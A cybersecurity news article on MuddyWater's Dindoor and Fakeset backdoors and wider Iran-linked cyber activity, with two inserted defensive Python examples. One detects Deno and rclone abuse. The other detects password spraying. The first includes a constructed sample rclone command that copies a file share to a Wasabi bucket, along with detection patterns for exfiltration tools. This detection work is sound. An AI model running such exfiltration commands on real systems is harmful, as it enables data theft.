Iran-Linked MuddyWater Hackers Target U.S. Networks with New Dindoor Backdoor Amid Rising Tensions

Security researchers have uncovered a new cyber campaign by an Iran-linked threat group targeting organizations in the United States and other regions using previously unseen malware.

Researchers from Broadcom’s Symantec and the Carbon Black Threat Hunter Team reported that the attacks have been carried out by MuddyWater, also known as Seedworm, a state-sponsored hacking group linked to Iran’s Ministry of Intelligence and Security (MOIS).

The researchers discovered that the group had gained access to networks belonging to several organizations, including banks, airports, nonprofit organizations, and the Israeli branch of a software company that supplies technology to the defense and aerospace industries.

The campaign is believed to have started in early February 2026 and was observed shortly after military strikes carried out by the United States and Israel against Iran.

New Dindoor Backdoor Discovered

Investigators found that the intrusions at the software company, a U.S. bank, and a Canadian nonprofit were used to deploy a previously unknown backdoor called Dindoor. The malware is built on the Deno JavaScript runtime, which it uses to execute its malicious functions.

Researchers also detected attempts to exfiltrate data from the compromised software company using the file synchronization tool Rclone, transferring data to a Wasabi Technologies cloud storage bucket. However, it remains unclear whether the data theft attempt was successful.
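As an added illustration, not code from Symantec's report or from the campaign itself, the following Python snippet shows what hunting for the two behaviours described above might look like on process-start telemetry: a Deno runtime launched from a script host with network and subprocess permissions, and an rclone transfer whose destination is an object-storage remote, whether the endpoint is inline on the command line or hidden behind a named remote in rclone.conf. The sample events, paths, remote names, bucket name and rclone.conf are constructed; the choice of suspicious parent processes, Deno permission flags and endpoint patterns is an assumption of this example, not an indicator published with the research.

```python
import configparser
import re
import shlex

# Constructed sample data, not real telemetry: process-start records shaped like
# Sysmon Event ID 1 / EDR fields, plus an rclone.conf staged the way an operator
# might. Paths, user names, remote names and the bucket name are invented.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"id": 2, "image": r"C:\Users\jdoe\AppData\Local\deno\deno.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"deno.exe run --allow-net --allow-run C:\Users\jdoe\AppData\Roaming\update.js"},
    {"id": 3, "image": r"C:\Users\jdoe\.deno\bin\deno.exe",
     "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": "deno.exe test --allow-net"},
    {"id": 4, "image": r"C:\ProgramData\rc\rclone.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'rclone.exe copy D:\Shares\Engineering ":s3,endpoint=s3.wasabisys.com:bkt-2026" -q'},
    {"id": 5, "image": r"C:\Tools\rclone\rclone.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "rclone.exe lsd corp-backup:"},
    {"id": 6, "image": r"C:\Tools\rclone\rclone.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"rclone.exe sync C:\Users\jdoe\Documents corp-backup:docs --transfers 16"},
]

SAMPLE_RCLONE_CONF = """\
[corp-backup]
type = s3
provider = Wasabi
access_key_id = AKIAEXAMPLE
secret_access_key = secretEXAMPLE
endpoint = s3.wasabisys.com

[nas]
type = sftp
host = nas.corp.local
"""

# Assumptions, not indicators published with the research: script hosts and
# shells are suspicious parents for a JavaScript runtime; --allow-net together
# with --allow-run (or -A / --allow-all) is the Deno permission set a backdoor
# needs; an object-store destination on an rclone transfer verb is the
# exfiltration shape described above (Rclone to a Wasabi bucket).
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe"}
DENO_NET = re.compile(r"--allow-(net|all)\b|(?<!\S)-A(?!\S)")
DENO_RUN = re.compile(r"--allow-(run|all)\b|(?<!\S)-A(?!\S)")
RCLONE_TRANSFER_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
OBJECT_STORE_ENDPOINT = re.compile(r"wasabisys\.com|:s3[,:]|--s3-endpoint", re.I)
OBJECT_STORE_TYPES = {"s3", "b2", "azureblob"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def object_store_remotes(conf_text):
    """Names of remotes in an rclone.conf whose backend type is object storage."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(conf_text)
    return {name for name in cfg.sections()
            if cfg[name].get("type", "").strip().lower() in OBJECT_STORE_TYPES}


def check_event(ev, remotes=frozenset()):
    """Return the reasons (possibly none) a single process-start event is flagged."""
    reasons = []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    if image == "deno.exe":
        if DENO_NET.search(cmd) and DENO_RUN.search(cmd):
            reasons.append("deno launched with network and subprocess permissions")
        if parent in SCRIPT_HOST_PARENTS:
            reasons.append(f"deno spawned by script host or shell {parent}")
    elif image == "rclone.exe":
        # posix=False keeps Windows backslashes intact; quotes are stripped below
        args = [a.strip('"') for a in shlex.split(cmd, posix=False)]
        verb = args[1].lower() if len(args) > 1 else ""
        if verb in RCLONE_TRANSFER_VERBS:
            if OBJECT_STORE_ENDPOINT.search(cmd):
                reasons.append("rclone transfer to inline object-store endpoint")
            # named remotes ("name:path") hide the endpoint in rclone.conf
            for arg in args[2:]:
                name = arg.split(":", 1)[0]
                if ":" in arg and name in remotes:
                    reasons.append(f"rclone transfer to object-store remote '{name}'")
    return reasons


def hunt(events, conf_text=""):
    """Map event id -> reasons for every event that trips at least one check."""
    remotes = object_store_remotes(conf_text) if conf_text else frozenset()
    return {ev["id"]: r for ev in events if (r := check_event(ev, remotes))}


if __name__ == "__main__":
    for eid, reasons in hunt(SAMPLE_EVENTS, SAMPLE_RCLONE_CONF).items():
        print(eid, "; ".join(reasons))
```

Two details matter in practice. Rclone's named remotes keep the endpoint in rclone.conf rather than on the command line, so a command-line-only rule misses event 6 and only fires once the config is resolved. And a Deno process by itself is unremarkable on developer workstations, which is why the Deno checks key on the parent process and the permission flags rather than the binary name.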

Additional Backdoor Identified

In separate incidents involving a U.S. airport and a nonprofit organization, analysts discovered another backdoor called Fakeset, written in Python. The malware was downloaded from servers operated by Backblaze, a cloud storage and backup service provider.

The digital certificate used to sign the Fakeset malware has previously been associated with Stagecomp and Darkcomp, two malware families that have been linked to MuddyWater in past operations.

According to Brigid O'Gorman, a senior intelligence analyst with Symantec and Carbon Black, antivirus vendors including Microsoft and Kaspersky have detected Stagecomp and Darkcomp samples under signatures that attribute them to MuddyWater.

Although those specific malware strains were not discovered in the newly targeted networks, the reuse of the same signing certificates strongly suggests that the attacks were carried out by the same threat actor.

Rising Iranian Cyber Activity

Researchers noted that Iranian threat actors have significantly improved their capabilities in recent years. Along with developing more advanced malware tools, they have become increasingly effective at social engineering techniques such as spear-phishing campaigns and honeytrap operations to gain access to sensitive accounts and information.

The discovery comes amid escalating geopolitical tensions involving Iran, the United States, and Israel. Cyber activity linked to Iran and allied groups has increased as part of the broader conflict.

Research from Check Point Software Technologies recently revealed that a pro-Palestinian hacktivist group known as Handala Hack (also called Void Manticore) has been routing operations through Starlink IP ranges while scanning internet-facing systems for vulnerabilities and weak credentials.

Meanwhile, several Iran-linked groups, including Agrius, have been observed scanning networks for vulnerable surveillance devices such as cameras produced by Hikvision and Dahua Technology. The attacks exploit known security flaws in these devices.

Security researchers believe compromised surveillance cameras could potentially be used for operational intelligence, including monitoring infrastructure and assessing damage after missile strikes.

Escalating Cyber Conflict

Amid the ongoing conflict, the Canadian Centre for Cyber Security has warned that Iran may increase cyber operations against critical infrastructure and information systems as part of retaliatory actions.

Recent reports also highlight several developments in the cyber domain:

  • Israeli intelligence agencies reportedly accessed Tehran’s traffic camera network for years to track the movements of security personnel protecting senior Iranian leaders, including Ali Khamenei.
  • Iran’s Islamic Revolutionary Guard Corps (IRGC) allegedly targeted an Amazon data center in Bahrain due to the company’s perceived support for Israeli military operations.
  • Active destructive cyber campaigns using data-wiping malware have reportedly targeted Israeli sectors including energy, finance, government, and utilities.
  • Iranian threat groups such as Charming Kitten, OilRig, Elfin, and Fox Kitten have shown signs of renewed activity as geopolitical tensions rise.
  • A coordinated cyber campaign known as OpIsrael has targeted Israeli government systems and industrial infrastructure, involving groups like NoName057(16) and Cyber Islamic Resistance.
  • The pro-Russian hacktivist group Z-Pentest has claimed responsibility for breaching several U.S. entities, including industrial control systems and surveillance networks.

Security experts say Iran's cyber doctrine increasingly focuses on exploiting identity systems and cloud platforms. Rather than depending on zero-day vulnerabilities, Iranian operators typically use credential theft, password spraying, and social engineering to gain initial access, then establish persistence.
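Added example, not from the article or the sources it cites: a small Python detector for the password-spraying pattern the passage describes, run over constructed authentication log lines. It flags a source address that fails logins against many distinct accounts with only a few attempts each inside a time window, and reports any account that then logged in successfully from that source, which is the case worth escalating. The log format, thresholds and addresses (documentation ranges) are assumptions of this example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication events, not real logs. The addresses are from
# documentation ranges. 203.0.113.5 tries one guess against many accounts and then
# gets into one of them; 198.51.100.7 hammers a single account, which is brute
# force rather than spraying and should not match this rule.
SAMPLE_LOG = """\
2026-02-10T08:00:01Z src=203.0.113.5 user=alice result=FAIL
2026-02-10T08:00:04Z src=203.0.113.5 user=bob result=FAIL
2026-02-10T08:00:07Z src=203.0.113.5 user=carol result=FAIL
2026-02-10T08:00:10Z src=203.0.113.5 user=dave result=FAIL
2026-02-10T08:00:13Z src=203.0.113.5 user=erin result=FAIL
2026-02-10T08:00:16Z src=203.0.113.5 user=frank result=FAIL
2026-02-10T08:00:19Z src=203.0.113.5 user=grace result=FAIL
2026-02-10T08:00:22Z src=203.0.113.5 user=heidi result=FAIL
2026-02-10T08:00:25Z src=203.0.113.5 user=ivan result=FAIL
2026-02-10T08:00:28Z src=203.0.113.5 user=judy result=SUCCESS
2026-02-10T08:01:00Z src=198.51.100.7 user=alice result=FAIL
2026-02-10T08:01:05Z src=198.51.100.7 user=alice result=FAIL
2026-02-10T08:01:09Z src=198.51.100.7 user=alice result=FAIL
2026-02-10T08:01:14Z src=198.51.100.7 user=alice result=FAIL
2026-02-10T08:01:20Z src=198.51.100.7 user=alice result=SUCCESS
2026-02-10T09:30:00Z src=192.0.2.9 user=mallory result=FAIL
"""

# Assumed log format: "<ISO timestamp> src=<ip> user=<name> result=SUCCESS|FAIL"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAIL)$"
)


def parse(log_text):
    """Parse the assumed format into (timestamp, src, user, success) tuples, sorted by time."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines in another format instead of failing the whole run
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["src"], m["user"].lower(), m["result"] == "SUCCESS"))
    return sorted(events)


def detect_spray(events, window=timedelta(minutes=10), min_users=8, max_per_user=2):
    """Per source address, slide a time window over its failed logins and flag the
    source once the window holds at least min_users distinct accounts with no
    account failing more than max_per_user times (many users, few tries each).
    Returns src -> summary, including accounts that logged in successfully from
    that source during the spray or within one window after it."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if not e[3]]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = Counter(e[2] for e in fails[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                first, last = fails[start][0], fails[end][0]
                successes = {e[2] for e in evs
                             if e[3] and first <= e[0] <= last + window}
                findings[src] = {"users": len(per_user), "first": first,
                                 "last": last, "successes": successes}
    return findings


if __name__ == "__main__":
    for src, f in detect_spray(parse(SAMPLE_LOG)).items():
        print(f"{src}: {f['users']} accounts sprayed {f['first']}..{f['last']}, "
              f"successful logins: {sorted(f['successes']) or 'none'}")
```

The thresholds are deliberately conservative so that ordinary help-desk activity or a shared NAT address does not trip the rule; a per-source window also says nothing about a low-and-slow spray spread across many addresses, which is why a second pass keyed on the set of targeted accounts or on a shared client fingerprint is usually paired with it.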

Defensive Recommendations

Security experts recommend that organizations strengthen their cybersecurity defenses by improving monitoring systems, limiting internet exposure, disabling remote access to operational technology networks, and enforcing phishing-resistant multi-factor authentication.

Additional measures include network segmentation, maintaining offline backups, and ensuring that internet-facing systems such as VPN gateways and applications remain fully patched and up to date.

Experts warn that organizations in Western countries should remain on high alert, as cyber operations linked to the conflict could evolve from hacktivism into more destructive attacks targeting critical infrastructure.


1 Comment

  • This report highlights the growing sophistication of Iranian state-sponsored cyber operations. MuddyWater’s use of the new Dindoor backdoor, along with social engineering and cloud-based tools like Rclone, shows a clear focus on stealth and persistence. Organizations, especially in critical infrastructure and defense sectors, must remain vigilant, implement strong monitoring, and enforce phishing-resistant multi-factor authentication to mitigate these evolving threats.
